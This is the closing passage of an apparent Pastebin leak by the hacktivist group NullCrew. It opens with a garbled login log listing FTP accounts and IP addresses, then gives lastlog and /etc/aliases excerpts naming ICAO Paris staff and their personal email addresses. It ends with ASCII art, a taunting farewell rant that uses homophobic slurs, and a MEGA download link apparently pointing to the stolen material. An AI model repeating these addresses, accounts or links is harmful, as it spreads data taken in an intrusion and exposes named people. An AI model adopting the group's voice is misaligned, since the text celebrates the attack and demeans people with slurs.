  970. KSftp1258 ftp             178.33.21.143   Ä KSftp1258                 178.33.21.143   Æ KSftp5674 ftp             36.227.173.52   {DKSftp5674                 36.227.173.52   ƒDKSftp9286 ftp             178.187.221.145 JrKSftp9286                 178.187.221.145 MrKSftp1629 ftp             119.9.69.153    •ŠKSftp1629                 119.9.69.153    œŠKSftp1378 ftp             119.177.84.73   ¬ÝKSftp1378                 119.177.84.73   ¶ÝKSftp3057 ftp             89.165.235.90   ÐëKSftp3057                 89.165.235.90   ÒëKSftp7793 ftp             5.79.156.207    LSftp7793                 5.79.156.207    ‡LSftp3582 ftp             89.165.235.90   øNLSftp3582                 89.165.235.90   ûNLSftp2359 ftp             220.162.158.45  ›LSftp2359                 220.162.158.45  ›LSftp3193 icaobigmanitou  94.228.187.146  [êLSftp3350 ftp             222.161.213.41  ëLSftp3350                 222.161.213.41  hìLSftp3985 icaobigmanitou  94.228.187.146  ñLSftp3193                 94.228.187.146  bñLSftp4024 icaobigmanitou  94.228.187.146  xñLSftp4024 icaobigmanitou  94.228.187.146  yñLSftp4129 icaobigmanitou  94.228.187.146  +òLSftp4129 icaobigmanitou  94.228.187.146  +òLSftp4147 icaobigmanitou  94.228.187.146  DòLSftp4154 icaobigmanitou  94.228.187.146  SòLSftp4129                 94.228.187.146  [óLSftp3985                 94.228.187.146  kóLSftp4449 icaobigmanitou  94.228.187.146  0õLSftp4024                 94.228.187.146  HöLSftp4613 icaobigmanitou  94.228.187.146  “öLSftp4704 icaobigmanitou  94.228.187.146  ˆ÷LSftp4147                 94.228.187.146  «÷LSftp4129                 94.228.187.146  ŸøLSftp4154                 94.228.187.146  ÇùLSftp5263 icaobigmanitou  94.228.187.146  ¤üLSftp5364 icaobigmanitou  94.228.187.146  €ýLSftp4449                 94.228.187.146  ²ýLSftp4704                 94.228.187.146  “þLSftp5548 icaobigmanitou  94.228.187.146  BÿLSftp5263                 94.228.187.146  
  971.  MSftp5655 icaobigmanitou  94.228.187.146  % MSftp4613                 94.228.187.146  Y MSftp5945 icaobigmanitou  94.228.187.146  7MSftp4024                 94.228.187.146  NMSftp6481 icaobigmanitou  94.228.187.146  ^ MSftp5655                 94.228.187.146  ˜ MSftp6543 icaobigmanitou  94.228.187.146  ð MSftp6576 icaobigmanitou  94.228.187.146  BMSftp5945                 94.228.187.146    MSftp6543                 94.228.187.146  Z     MSftp8044 ftp             89.184.108.5    ùMSftp8044                 89.184.108.5    ûMSftp8189 icaobigmanitou  94.228.187.146  BMSftp5364                 94.228.187.146  YMSftp8485 icaobigmanitou  94.228.187.146  ËMSftp6576                 94.228.187.146  áMSftp8771 icaobigmanitou  94.228.187.146  MSftp6481                 94.228.187.146  MSftp5548                 94.228.187.146  vMSftp8771                 94.228.187.146  vMSftp8485                 94.228.187.146  vMSftp8189                 94.228.187.146  MSftp6296 ftp             1.171.49.232    NSftp6296                 1.171.49.232    NSftp3599 ftp             2.49.213.192    ÿ'NSftp3599                 2.49.213.192    (NSftp5729 ftp             113.162.216.160 g=NSftp5729                 113.162.216.160 p=NSftp7059 ftp             180.166.7.134   ÐINSftp7059                 180.166.7.134   ×INSftp7267 ftp             78.189.192.133  ÓKNSftp7267                 78.189.192.133  ßKNSftp9511 icaobigmanitou  94.228.187.146  ˜`NSftp9525 icaobigmanitou  94.228.187.146  º`NSftp9542 icaobigmanitou  94.228.187.146  aNSftp9542                 94.228.187.146  aNSftp9525                 94.228.187.146  aNSftp9511                 94.228.187.146  aNSftp1108 ftp             86.106.172.126  #qNSftp1108                 86.106.172.126  HqNSftp1364 ftp             71.6.165.200    ˜sNSftp1364                 71.6.165.200    ˜sNSftp7878 ftp             93.114.240.222  m°NSftp7878                 93.114.240.222  o°NSftp9979 ftp             5.206.125.68    ?ÇNSftp9979                 5.206.125.68    BÇNSftp8649 ftp             180.218.30.189  Á+OSftp8649                 180.218.30.189  É+OSftp1848 ftp             113.162.216.160 ©SOSftp1848                 113.162.216.160 ³SOSftp2952 ftp             213.111.216.109 =`OSftp2952                 213.111.216.109 T`OSftp4844 ftp             178.95.196.144  vOSftp4844                 178.95.196.144  vOSftp7634 ftp             5.165.95.101    *”OSftp7634                 5.165.95.101    ,”OSftp8082 icaobigmanitou  94.228.187.146  ™OSftp8082                 94.228.187.146  2™OSftp8181 icaobigmanitou  94.228.187.146  *šOSftp8181                 94.228.187.146  0šOSftp8830 ftp             1.170.123.218   ± OSftp8830                 1.170.123.218   » OSftp9202 ftp             116.202.154.234 ñ£OSftp9202                 116.202.154.234 ¤OSftp3903 ftp             182.180.89.201  éÏOSftp3903                 182.180.89.201  ðÏOSftp7906 ftp             213.155.207.228 —çOSftp7906                 213.155.207.228 £çOSftp1440 ftp             37.113.3.99     üOSftp1440                 37.113.3.99    
  972. üOSftp3488 ftp             89.149.94.150   DPSftp3488                 89.149.94.150   GPSftp1774 ftp             49.254.137.34   #iPSftp1774                 49.254.137.34   +iPSftp5173 ftp             180.218.48.24   Í¥PSftp5173                 180.218.48.24   Õ¥PSftp8104 ftp             198.20.70.114   ¬ÍPSftp8104                 198.20.70.114   ­ÍPSftp4246 ftp             178.94.209.169  _QSftp4246                 178.94.209.169  dQSftp5829 ftp             123.195.113.183 Á#QSftp5829                 123.195.113.183 Ù#QSftp9356 ftp             67.215.9.229    „ÄQSftp9356                 67.215.9.229    IÆQSftp2030 ftp             116.224.67.61   ~äQSftp2030                 116.224.67.61   ˆäQSftp4267 ftp             61.172.115.229  SRSftp4267                 61.172.115.229  _RSftp5270 ftp             14.139.244.115  wRSftp5270                 14.139.244.115  RSftp6046 ftp             164.100.6.2     RSftp6046                 164.100.6.2      RSftp4571 ftp             5.165.70.234    +„RSftp4571  
  973.                5.165.70.234    3„RSftp6092 ftp             50.23.237.141   *SSftp6092                 50.23.237.141   0SS
  974.  
  975. lastlog:
  976.  
  977. ’_NSttyp0   94.228.187.146  à§Rttyp0   94.228.187.146  S Sttyp0   adsl1.aqueos.co
  978.  
  979. /etc/aliases:
  980. paris.icao.int~soaeurnat: mbeland@paris.icao.int, gfirican@paris.icao.int, vkourenkov@paris.icao.int@paris.icao.int paris.icao.int~gvega: gvega53@gmail.com paris.icao.int~fjouve: fjouve75@aol.com
  981.  
  982.  
  983.  
  984.  
  985.   █████  █   █ ███████ ████   █████
  986.  █     █ █   █    █    █   █ █     █ - And download.
  987.  █     █ █   █    █    █     █     █
  988.  █     █ █   █    █    █     █     █
  989.   █████  █████    █    █      █████
  990.  
  991.   o                |
  992.              .     -O-    
  993.   .                 |        *      .     -0-     Until next time, fellas!
  994.          *  o     .    '       *      .        o
  995.                 .         .        |      *
  996.      *             *              -O-          .
  997.            .             *         |     ,
  998.                   .           o
  999.           .---.
  1000.     =   _/__~0_\_     .  *            o       '
  1001.    = = (_________)             .            
  1002.                    .                        *
  1003.         *               - ) -       *      
  1004.                 .               .
  1005.  
  1006.     Aww, sad-face, NullCrew's zine is over? Yes, it is; but it's not the end of NullCrew or #FuckTheSystem.
  1007.    We will continue on our way, flying our saucer over government fagots; dropping a probe, and having it shoved up theri anus.
  1008.    It never ends, and we will never stop; Hacktivists, activists, and the people have all pointed their finger at this system.. and we will see it crumble.
  1009.    
  1010.     This is also a thank you to those whom have stuck with us for this past year and some odd months.
  1011.    Thank you to our fans, haters, and supporters; let us have a wonderful year, and show them what they don't want to see.
  1012.    A nation united by people who have no fear, and see through your lies.. your shadows are being cast away, and do not affect us.
  1013.  
  1014.     We are free, and that is a beautiful thing to say..
  1015.  
  1016.     We know, we know! Enough with the rants, yes?
  1017.    Here, have the download link already; you silly faggots, and one last thing:
  1018.    
  1019.    █████████████████████████████████████████████████████████████████████████████
  1020.   █                                                                             █
  1021.   █  https://mega.co.nz/#!dcZiXaaa!G1HFhBgra3I51pxxiPsvUCV9mh-dMv2lA54bmERVPa8  █                                                                       █
  1022.   █                                                                             █
  1023.    █████████████████████████████████████████████████████████████████████████████
  1024.  
  1025.  
  1026.                       dm
  1027.                       MMr
  1028.                      4MMML                  .
  1029.                      MMMMM.                xf
  1030.      .              "M6MMM               .MM-
  1031.       Mh..          +MM5MMM            .MMMM
  1032.       .MMM.         .MMMMML.          MMMMMh
  1033.        )MMMh.        MM5MMM         MMMMMMM
  1034.         3MMMMx.     'MMM3MMf      xnMMMMMM"
  1035.         '*MMMMM      MMMMMM.     nMMMMMMP"
  1036.           *MMMMMx    "MMM5M\    .MMMMMMM=
  1037.            *MMMMMh   "MMMMM"   JMMMMMMP
  1038.              MMMMMM   GMMMM.  dMMMMMM            .
  1039.               MMMMMM  "MMMM  .MMMMM(        .nnMP"
  1040.    ..          *MMMMx  MMM"  dMMMM"    .nnMMMMM*
  1041.     "MMn...     'MMMMr 'MM   MMM"   .nMMMMMMM*"
  1042.      "4MMMMnn..   *MMM  MM  MMP"  .dMMMMMMM""
  1043.        ^MMMMMMMMx.  *ML "M .M*  .MMMMMM**"
  1044.           *PMMMMMMhn. *x > M  .MMMM**""
  1045.              ""**MMMMhx/.h/ .=*"
  1046.                       .3P"%....
  1047.                    nP"     "*MMnx
  1048.  
  1049. db   db  .d8b.  d8888b. d8888b. db    db     j88D    .d888b.  .d88b.  db
  1050. 88   88 d8' `8b 88  `8D 88  `8D `8b  d8'    j8~88    VP  `8D .8P  88. 88
  1051. 88ooo88 88ooo88 88oodD' 88oodD'  `8bd8'    j8' 88       odD' 88  d'88 YP
  1052. 88~~~88 88~~~88 88~~~   88~~~      88      V88888D    .88'   88 d' 88     - Especially you, silly govt.
  1053. 88   88 88   88 88      88         88          88    j88.    `88  d8' db
  1054. YP   YP YP   YP 88      88         YP          VP    888888D  `Y88P'  YP
  1055.    
  1056. From your friendly neighborhood aliens! - NullCrew
  1057. twitter.com/NullCrew_FTS
RAW Paste Data
Pastebin PRO WINTER Special!
Get 40% OFF Pastebin PRO accounts!
Top